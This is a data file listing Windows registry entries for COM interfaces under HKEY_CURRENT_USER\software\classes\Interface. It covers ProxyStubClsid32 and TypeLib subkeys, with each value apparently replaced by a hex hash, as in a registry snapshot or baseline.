HKEY_CURRENT_USER\software\classes\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52};(default)=a542df0018b139a18d09a4a11d39a7f9
HKEY_CURRENT_USER\software\classes\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7};(default)=4c1c5e2d006ce54bd75201affac36d8e
HKEY_CURRENT_USER\software\classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF};(default)=44524ede26a976886c2fdebe8a147e91
HKEY_CURRENT_USER\software\classes\Interface\{EB3EED27-BCC1-4E91-A65B-9C2AFB189F4F};(default)=8a718eeee9c465d20c36455018986e26
HKEY_CURRENT_USER\software\classes\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3};(default)=26a4019106b1101928e2d5523096d1c9
HKEY_CURRENT_USER\software\classes\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406};(default)=3b669df32600a7eb23d3359ffc852d93
HKEY_CURRENT_USER\software\classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6};(default)=0d0466df080a81ed888be8da1c53f31c
HKEY_CURRENT_USER\software\classes\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17};(default)=25d5b0175f525e4e01fa08d0c68ee94b
HKEY_CURRENT_USER\software\classes\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\ProxyStubClsid32;(default)=87f5e58a3e3679df6be332b9e70949c4
HKEY_CURRENT_USER\software\classes\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\ProxyStubClsid32;(default)=77bb5e476b91d8d9175c212d8c932229
HKEY_CURRENT_USER\software\classes\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\ProxyStubClsid32;(default)=11001d70b80c17c7f5b07bc38eb02e03
HKEY_CURRENT_USER\software\classes\Interface\{0f872661-c863-47a4-863f-c065c182858a}\ProxyStubClsid32;(default)=a33147bf28c6488bfc1b068fed7c0249
HKEY_CURRENT_USER\software\classes\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\ProxyStubClsid32;(default)=1fa6b8e2301965b8426ff1b1b76fa443
HKEY_CURRENT_USER\software\classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\ProxyStubClsid32;(default)=e4b8f098ef212d4cbd35ba51ef2c3d48
HKEY_CURRENT_USER\software\classes\Interface\{13987a48-a837-465d-b6be-8302db0e4ce6}\ProxyStubClsid32;(default)=36118ec94caf23e3781b86d2b6fbc37b
HKEY_CURRENT_USER\software\classes\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\ProxyStubClsid32;(default)=49587d6fbe5365d72be3a1fa1411b714
HKEY_CURRENT_USER\software\classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\ProxyStubClsid32;(default)=3521607f23a86c804c1ba80ded5bcecc
HKEY_CURRENT_USER\software\classes\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\ProxyStubClsid32;(default)=855e26113dfd343413550a05b160b4b2
HKEY_CURRENT_USER\software\classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\ProxyStubClsid32;(default)=c436ebda79e1841ad0f88c9b171edf24
HKEY_CURRENT_USER\software\classes\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\ProxyStubClsid32;(default)=5b13f62203ed8d1519e4d3745be1c80f
HKEY_CURRENT_USER\software\classes\Interface\{2B865677-AC3A-43BD-B9E7-BF6FCD3F0596}\ProxyStubClsid32;(default)=349b40a61517a24d26fb78817354e6b3
HKEY_CURRENT_USER\software\classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\ProxyStubClsid32;(default)=1d61d7ae409dd5275fb2ea179151c8cf
HKEY_CURRENT_USER\software\classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\ProxyStubClsid32;(default)=abe8236832b9d1d1f48b436c17676552
HKEY_CURRENT_USER\software\classes\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\ProxyStubClsid32;(default)=06b4b1488c755d1462996de377ec5f1e
HKEY_CURRENT_USER\software\classes\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\ProxyStubClsid32;(default)=2e59b4b32b01b928374ff2ea7974c1ea
HKEY_CURRENT_USER\software\classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\ProxyStubClsid32;(default)=65b871533d42cb86103d989272062032
HKEY_CURRENT_USER\software\classes\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\ProxyStubClsid32;(default)=29ad59dbaeb3f99ac3dd818967cda044
HKEY_CURRENT_USER\software\classes\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\ProxyStubClsid32;(default)=577a18f10b981a5e57b6d23ee1c28141
HKEY_CURRENT_USER\software\classes\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\ProxyStubClsid32;(default)=aafd28ba907b773bf34eeedb8065ab4b
HKEY_CURRENT_USER\software\classes\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\ProxyStubClsid32;(default)=bfdf6eb9a63426cb0411453f56de9df5
HKEY_CURRENT_USER\software\classes\Interface\{54034913-37F9-4E26-8646-3D2EF536C786}\ProxyStubClsid32;(default)=a20dc85e1dc43ece0b176db9bdb40f24
HKEY_CURRENT_USER\software\classes\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\ProxyStubClsid32;(default)=d2e5acd32727890264374e2e059474f2
HKEY_CURRENT_USER\software\classes\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\ProxyStubClsid32;(default)=1b0ed99ec099205c59d513967c906866
HKEY_CURRENT_USER\software\classes\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024}\ProxyStubClsid32;(default)=8066ee26eeb0ae447fc964986fe23429
HKEY_CURRENT_USER\software\classes\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\ProxyStubClsid32;(default)=17a4baa5bbd1c2fe8376816f12dcc8f7
HKEY_CURRENT_USER\software\classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\ProxyStubClsid32;(default)=b66486162f8179b176b777bfb8eab07d
HKEY_CURRENT_USER\software\classes\Interface\{886DFE8E-D1BB-4062-B7C6-57DA328A37F8}\ProxyStubClsid32;(default)=4d2b3394aff7e40d627a143cf0d86a35
HKEY_CURRENT_USER\software\classes\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\ProxyStubClsid32;(default)=d968988714f691126f48b550a28722f4
HKEY_CURRENT_USER\software\classes\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\ProxyStubClsid32;(default)=eb8ea446e269977ccc397114b644d2e8
HKEY_CURRENT_USER\software\classes\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\ProxyStubClsid32;(default)=15597e057b09fb2968556aab64105d8a
HKEY_CURRENT_USER\software\classes\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\ProxyStubClsid32;(default)=ff2d60446a157e77fac170afe902d4f0
HKEY_CURRENT_USER\software\classes\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}\ProxyStubClsid32;(default)=c5d5a9dfab84c843b1c941310a7acecb
HKEY_CURRENT_USER\software\classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\ProxyStubClsid32;(default)=b026752dffaffe245053bbd6cb9eb495
HKEY_CURRENT_USER\software\classes\Interface\{A87958FF-B414-7748-9183-DBF183A25905}\ProxyStubClsid32;(default)=6355f96a451bb0159579fb188deffb84
HKEY_CURRENT_USER\software\classes\Interface\{A91EFACB-8B83-4B84-B797-1C8CF3AB3DCB}\ProxyStubClsid32;(default)=aeae1b73d31d762cd531ed97dad51e06
HKEY_CURRENT_USER\software\classes\Interface\{AB0CD980-906C-4FBB-9A5D-9E32A3C0CB37}\ProxyStubClsid32;(default)=97c3d178862e5badccecad991e64d7d8
HKEY_CURRENT_USER\software\classes\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\ProxyStubClsid32;(default)=8d893b0aee2994c3b435df21c35201ee
HKEY_CURRENT_USER\software\classes\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\ProxyStubClsid32;(default)=19fad085fc5fafea516aa3f346003ccf
HKEY_CURRENT_USER\software\classes\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\ProxyStubClsid32;(default)=e538197da2b1a75b60b79d32a8e304e4
HKEY_CURRENT_USER\software\classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\ProxyStubClsid32;(default)=8a4762ac55da1262265ede7e1218c74c
HKEY_CURRENT_USER\software\classes\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\ProxyStubClsid32;(default)=e5f6ace32f873934f980090c5565c59b
HKEY_CURRENT_USER\software\classes\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\ProxyStubClsid32;(default)=9d4eb080145710fb12299dc551feb7b3
HKEY_CURRENT_USER\software\classes\Interface\{B5CDC0E5-9558-4899-A58B-5D894F493C1D}\ProxyStubClsid32;(default)=61b422fefdb739d2c1187b0a38d10c6e
HKEY_CURRENT_USER\software\classes\Interface\{B5E5EE2E-E012-4FC8-BCE0-C956AF66C4F3}\ProxyStubClsid32;(default)=0ebcb1eaf90b2981ae0269e6f306b3ec
HKEY_CURRENT_USER\software\classes\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\ProxyStubClsid32;(default)=dfc8d6264de96b89d64e0c0d59bb9c5f
HKEY_CURRENT_USER\software\classes\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\ProxyStubClsid32;(default)=62a16df063a0a66281b1511a09a1ad51
HKEY_CURRENT_USER\software\classes\Interface\{C47B67D4-BA96-44BC-AB9E-1CAC8EEA9E93}\ProxyStubClsid32;(default)=70631b6dba447633544ab56ba6ff80d2
HKEY_CURRENT_USER\software\classes\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\ProxyStubClsid32;(default)=792ee813cd83e45977de009c4c5a0118
HKEY_CURRENT_USER\software\classes\Interface\{D32F7B3A-DEC8-4F44-AF28-E9B7FEB62118}\ProxyStubClsid32;(default)=e750d12a17193130f2bde84333b1948c
HKEY_CURRENT_USER\software\classes\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\ProxyStubClsid32;(default)=2ab0f49154e3279782ad3449b4fe3fee
HKEY_CURRENT_USER\software\classes\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\ProxyStubClsid32;(default)=a8df6417e5122caaf5df9b59b9181a38
HKEY_CURRENT_USER\software\classes\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\ProxyStubClsid32;(default)=e3a4bf265945970c726b78892c5007c2
HKEY_CURRENT_USER\software\classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\ProxyStubClsid32;(default)=91a2ce65aa1df0fcb3e38e406d13bdf7
HKEY_CURRENT_USER\software\classes\Interface\{EB3EED27-BCC1-4E91-A65B-9C2AFB189F4F}\ProxyStubClsid32;(default)=76dcd2c92d818296fd1b641842db9745
HKEY_CURRENT_USER\software\classes\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\ProxyStubClsid32;(default)=5cad71c84aa14a8bdf370f97f7cd5211
HKEY_CURRENT_USER\software\classes\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\ProxyStubClsid32;(default)=30631a1f8fa8ebeb72c05a87e6737663
HKEY_CURRENT_USER\software\classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\ProxyStubClsid32;(default)=34381835f9c37367dee2efc6eaf29f0d
HKEY_CURRENT_USER\software\classes\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\ProxyStubClsid32;(default)=87d76ab371ca4cc6183d3e3d9d7cff4d
HKEY_CURRENT_USER\software\classes\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\TypeLib;(default)=2667ede11b66c4a0648b249492d7fa79
HKEY_CURRENT_USER\software\classes\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\TypeLib;(default)=49c292a39edd1c8e1901306bf48f8313
HKEY_CURRENT_USER\software\classes\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\TypeLib;(default)=3f5c0c9bc20bdb0bf3aca0a033c92be5
HKEY_CURRENT_USER\software\classes\Interface\{0f872661-c863-47a4-863f-c065c182858a}\TypeLib;(default)=4c45868e2893ed8f89ee09622a40486d
HKEY_CURRENT_USER\software\classes\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\TypeLib;(default)=07e5348198a616c7262c7864b5e3d52b
HKEY_CURRENT_USER\software\classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\TypeLib;(default)=569c5c61de7c4f645eab1c3fd13e8bf1
HKEY_CURRENT_USER\software\classes\Interface\{13987a48-a837-465d-b6be-8302db0e4ce6}\TypeLib;(default)=ee6f335e6594cfde9b61a1875fa18f6a
HKEY_CURRENT_USER\software\classes\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib;(default)=058649c7a5665b7f4f3d4df1cfdfda61
HKEY_CURRENT_USER\software\classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\TypeLib;(default)=f20cf4b24a7277507553711cbf517179
HKEY_CURRENT_USER\software\classes\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\TypeLib;(default)=d161b5b88fb911e3dbbbda66eaf90407
HKEY_CURRENT_USER\software\classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\TypeLib;(default)=d4b05388f7997732f147e2f93f8b97cd
HKEY_CURRENT_USER\software\classes\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\TypeLib;(default)=5f8b0750f9cb740db98e20712321b7a9
HKEY_CURRENT_USER\software\classes\Interface\{2B865677-AC3A-43BD-B9E7-BF6FCD3F0596}\TypeLib;(default)=a9baa7651e67b3354c04eb5d782413d0
HKEY_CURRENT_USER\software\classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\TypeLib;(default)=b38d7f91c723d1525093716dca57f2e3
HKEY_CURRENT_USER\software\classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\TypeLib;(default)=0b322c494244cc2404427bbda9448d70
HKEY_CURRENT_USER\software\classes\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\TypeLib;(default)=c1695ec40ea6b6459e2adb1251e0f362
HKEY_CURRENT_USER\software\classes\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\TypeLib;(default)=8ed7c45f9f23768f5045e3c4e563f897
HKEY_CURRENT_USER\software\classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\TypeLib;(default)=622d82e77429b21100b6487f5f01c15f
HKEY_CURRENT_USER\software\classes\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\TypeLib;(default)=50f1075f9aaa12fd8449c51f7f1f287b
HKEY_CURRENT_USER\software\classes\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\TypeLib;(default)=bf511dbe348adf9b1b42efb0d3fa97ce
HKEY_CURRENT_USER\software\classes\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\TypeLib;(default)=c239d8075d9ccfae6d3c9979703a8b66
HKEY_CURRENT_USER\software\classes\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\TypeLib;(default)=51e51a4ab90bea54ea1797795814290b
HKEY_CURRENT_USER\software\classes\Interface\{54034913-37F9-4E26-8646-3D2EF536C786}\TypeLib;(default)=5415d3e628934cca07e1fcb5fd0c0def
HKEY_CURRENT_USER\software\classes\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\TypeLib;(default)=e163cb643c00a189023ec9c57178d02c
HKEY_CURRENT_USER\software\classes\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\TypeLib;(default)=0601f20a649c6dce48d700e234eae7d5
HKEY_CURRENT_USER\software\classes\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024}\TypeLib;(default)=e23a0947804f0520a4e91ab2fd1e7325
HKEY_CURRENT_USER\software\classes\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\TypeLib;(default)=c7eff082126124b1d521238491d8d97f
HKEY_CURRENT_USER\software\classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\TypeLib;(default)=98c64ef583ef036817cce7bde4b515bb
HKEY_CURRENT_USER\software\classes\Interface\{886DFE8E-D1BB-4062-B7C6-57DA328A37F8}\TypeLib;(default)=8480b1d3046304060fcaf4610bd0338b
HKEY_CURRENT_USER\software\classes\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\TypeLib;(default)=fc34ea214fc5bfa5a324444d5eea8fd8
HKEY_CURRENT_USER\software\classes\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\TypeLib;(default)=ab3735f1a7a477462ee033e55aac9db5
HKEY_CURRENT_USER\software\classes\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib;(default)=f5f2d45f4e11d8962af62c04ac2906ec
HKEY_CURRENT_USER\software\classes\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\TypeLib;(default)=aa27ac9a8b1e3491ed1dd06f625e00cc
HKEY_CURRENT_USER\software\classes\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}\TypeLib;(default)=fd1ee547b62d261187f80d10491980f3
HKEY_CURRENT_USER\software\classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib;(default)=6ca24d7c7f6f6465afb82dacd1b0c71f
HKEY_CURRENT_USER\software\classes\Interface\{A87958FF-B414-7748-9183-DBF183A25905}\TypeLib;(default)=5822bab69600216b4c2b37186fc2eaca
HKEY_CURRENT_USER\software\classes\Interface\{A91EFACB-8B83-4B84-B797-1C8CF3AB3DCB}\TypeLib;(default)=a6435b2b59284689e8e67a5127a31ab8
HKEY_CURRENT_USER\software\classes\Interface\{AB0CD980-906C-4FBB-9A5D-9E32A3C0CB37}\TypeLib;(default)=6c45ccbdb78bbfc2f626577712a126aa
HKEY_CURRENT_USER\software\classes\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib;(default)=f435d809bc626804047ebfbf6bb2e7ce
HKEY_CURRENT_USER\software\classes\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\TypeLib;(default)=fc4fbf90e849987daebf93e2929f6cba
HKEY_CURRENT_USER\software\classes\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\TypeLib;(default)=e54f69a5084a30d212d107adf47427aa
HKEY_CURRENT_USER\software\classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\TypeLib;(default)=f3e2aa87814de9116d7f8facb3db703b
HKEY_CURRENT_USER\software\classes\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\TypeLib;(default)=5f4dca7129e7f26a0fbafee8cdca0d25
HKEY_CURRENT_USER\software\classes\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\TypeLib;(default)=a24ac9f1114b8a944af4edc815efc749
HKEY_CURRENT_USER\software\classes\Interface\{B5CDC0E5-9558-4899-A58B-5D894F493C1D}\TypeLib;(default)=d47c2aba1836ba60d48cde7661f591a6
HKEY_CURRENT_USER\software\classes\Interface\{B5E5EE2E-E012-4FC8-BCE0-C956AF66C4F3}\TypeLib;(default)=3068f9bc80a4710ca4deee308c6e2e66
HKEY_CURRENT_USER\software\classes\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\TypeLib;(default)=d74fb3cb2c90a6f0b59c5edd9efb4966
HKEY_CURRENT_USER\software\classes\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\TypeLib;(default)=d00a3e414fb504197016ef87c1a1e347
HKEY_CURRENT_USER\software\classes\Interface\{C47B67D4-BA96-44BC-AB9E-1CAC8EEA9E93}\TypeLib;(default)=7603eee5aa9c81270db4ec1fd9dee44c
HKEY_CURRENT_USER\software\classes\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib;(default)=9cb326faa2f3d51a45bfdb02dd0800a8
HKEY_CURRENT_USER\software\classes\Interface\{D32F7B3A-DEC8-4F44-AF28-E9B7FEB62118}\TypeLib;(default)=df7cc6dc04a77d6539c2f5e7358dfe33
HKEY_CURRENT_USER\software\classes\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\TypeLib;(default)=9afdebc06dc62cc7f98aa22133f9f5c6
HKEY_CURRENT_USER\software\classes\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\TypeLib;(default)=03baa1ddbf7720ec36eb8947c1512125
HKEY_CURRENT_USER\software\classes\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib;(default)=1e39c4459f7f4143a4318d465867f1f0
HKEY_CURRENT_USER\software\classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\TypeLib;(default)=efe3f84d993b0bb590edc6c973e6fac8
HKEY_CURRENT_USER\software\classes\Interface\{EB3EED27-BCC1-4E91-A65B-9C2AFB189F4F}\TypeLib;(default)=882ab3baf3929c269aca272f4118b9c5
HKEY_CURRENT_USER\software\classes\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\TypeLib;(default)=d236b70a49e5e9e54570cef9c7e8549d
HKEY_CURRENT_USER\software\classes\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\TypeLib;(default)=7c42a95b1914937bac6487d2bcaf9166
HKEY_CURRENT_USER\software\classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\TypeLib;(default)=2dffe2eb78e3f72de5cb238eb1aed6f0
HKEY_CURRENT_USER\software\classes\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\TypeLib;(default)=b5e544a80d6c6fab9997462bb88317ad
HKEY_CURRENT_USER\software\classes\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\TypeLib;Version=8fe95f973454ad32609a7b460ab268d4
HKEY_CURRENT_USER\software\classes\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\TypeLib;Version=efd157f757a5b2e5ff8f0970c1d827f1
HKEY_CURRENT_USER\software\classes\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\TypeLib;Version=1a03b4810cd2a5a5bcddb32d29f055ee
HKEY_CURRENT_USER\software\classes\Interface\{0f872661-c863-47a4-863f-c065c182858a}\TypeLib;Version=117638295ef66dddf6e7499dfbd928d7
HKEY_CURRENT_USER\software\classes\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\TypeLib;Version=baaebf1ab75f315b686dca5879baedfb
HKEY_CURRENT_USER\software\classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\TypeLib;Version=bf6c1e582cbe2145ead10e3f6b80a13a
HKEY_CURRENT_USER\software\classes\Interface\{13987a48-a837-465d-b6be-8302db0e4ce6}\TypeLib;Version=5c9898176ca63482dff2790ac596f407
HKEY_CURRENT_USER\software\classes\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib;Version=418fe8a0df8a0ce8173820e21a1763e0
HKEY_CURRENT_USER\software\classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\TypeLib;Version=21339661a43f75ec3ea31676a671d93e
HKEY_CURRENT_USER\software\classes\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\TypeLib;Version=35d4da281f6c6d2aeaf30d139d2c733a
HKEY_CURRENT_USER\software\classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\TypeLib;Version=255bf997ead39dbc1ea0b9a715ee6b24
HKEY_CURRENT_USER\software\classes\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\TypeLib;Version=31b38fd4028e342d44e1be0b1d6f9a4a
HKEY_CURRENT_USER\software\classes\Interface\{2B865677-AC3A-43BD-B9E7-BF6FCD3F0596}\TypeLib;Version=7aab3151fb4e0dbec2321fa8f1732300
HKEY_CURRENT_USER\software\classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\TypeLib;Version=b5c261075e681b6920305af6bcb4c40e
HKEY_CURRENT_USER\software\classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\TypeLib;Version=9e550eace4e87545d9a24227140e47a4
HKEY_CURRENT_USER\software\classes\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\TypeLib;Version=cc0d808a6f4190e755e9d51bdefe8e56
HKEY_CURRENT_USER\software\classes\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\TypeLib;Version=02b5b1b81f6cf07be37ffc8f5588e2d0
HKEY_CURRENT_USER\software\classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\TypeLib;Version=4ec48b70d0c9e8011dd97a962dddf411
HKEY_CURRENT_USER\software\classes\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\TypeLib;Version=a56aebb2a1bf6d9ee3c0b7c9f77a5abc
HKEY_CURRENT_USER\software\classes\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\TypeLib;Version=c89586a0937032879a850bbfdd026667
HKEY_CURRENT_USER\software\classes\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\TypeLib;Version=e6f1e2e75d4e23c1d643ba35e12a3d56
HKEY_CURRENT_USER\software\classes\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\TypeLib;Version=78e90dd0cbb761bf3f3914e76103d9f5
HKEY_CURRENT_USER\software\classes\Interface\{54034913-37F9-4E26-8646-3D2EF536C786}\TypeLib;Version=5dd7f9f7ef19a105935305bc014c50d4
HKEY_CURRENT_USER\software\classes\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\TypeLib;Version=95129b726812d4ef347ffd77219914dc
HKEY_CURRENT_USER\software\classes\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\TypeLib;Version=be00661a7771c6e22188f6be3a3d80cc
HKEY_CURRENT_USER\software\classes\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024}\TypeLib;Version=9122d8e0ad502af25e0f5e47561fdadc
HKEY_CURRENT_USER\software\classes\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\TypeLib;Version=e81199a0ae40e50947547abdfd4ac568
HKEY_CURRENT_USER\software\classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\TypeLib;Version=45ebdaabfb05d52f1ea61eb7b2b1f53e
HKEY_CURRENT_USER\software\classes\Interface\{886DFE8E-D1BB-4062-B7C6-57DA328A37F8}\TypeLib;Version=e5b63c312392b4f4ce26c53bc63e6300
HKEY_CURRENT_USER\software\classes\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\TypeLib;Version=a0fc502a0ac1bab650ff2729a498438f
HKEY_CURRENT_USER\software\classes\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\TypeLib;Version=f0ceb2c24e290323ab59d83fff8fed21
HKEY_CURRENT_USER\software\classes\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib;Version=ba08b928bf5e636e90f11b481d14e0d2
HKEY_CURRENT_USER\software\classes\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\TypeLib;Version=a91aeef61c9caa2ce64ae4948f1bad61
HKEY_CURRENT_USER\software\classes\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}\TypeLib;Version=118c0885eda3631b0de82a8ad1f279a7
HKEY_CURRENT_USER\software\classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib;Version=e05c741a11236c3c753810b355c44b53
HKEY_CURRENT_USER\software\classes\Interface\{A87958FF-B414-7748-9183-DBF183A25905}\TypeLib;Version=707564213c5cf1439014e684a967bfc2
HKEY_CURRENT_USER\software\classes\Interface\{A91EFACB-8B83-4B84-B797-1C8CF3AB3DCB}\TypeLib;Version=aa8c1d5ee7465a4e16992cbd10beb1a1
HKEY_CURRENT_USER\software\classes\Interface\{AB0CD980-906C-4FBB-9A5D-9E32A3C0CB37}\TypeLib;Version=a68a22d6c15772218561a3b03b37bbd6
HKEY_CURRENT_USER\software\classes\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib;Version=b7d08f3ee5fc1e2f2c1e0b97c01ab529
HKEY_CURRENT_USER\software\classes\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\TypeLib;Version=6b12606d7d2ed40e4c61b47dd2b194f2
HKEY_CURRENT_USER\software\classes\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\TypeLib;Version=a20f4a434d9b7fd4fc3b8ab57805281d
HKEY_CURRENT_USER\software\classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\TypeLib;Version=960c44f50ccfadda18048b8cfee4538d
HKEY_CURRENT_USER\software\classes\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\TypeLib;Version=e959d53f94d28e744f408bb6e6c7f5ba
HKEY_CURRENT_USER\software\classes\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\TypeLib;Version=d2c71b23c782a4fe1d5880259039ee05
HKEY_CURRENT_USER\software\classes\Interface\{B5CDC0E5-9558-4899-A58B-5D894F493C1D}\TypeLib;Version=61a379770cc1344dd96cd16410a4e942
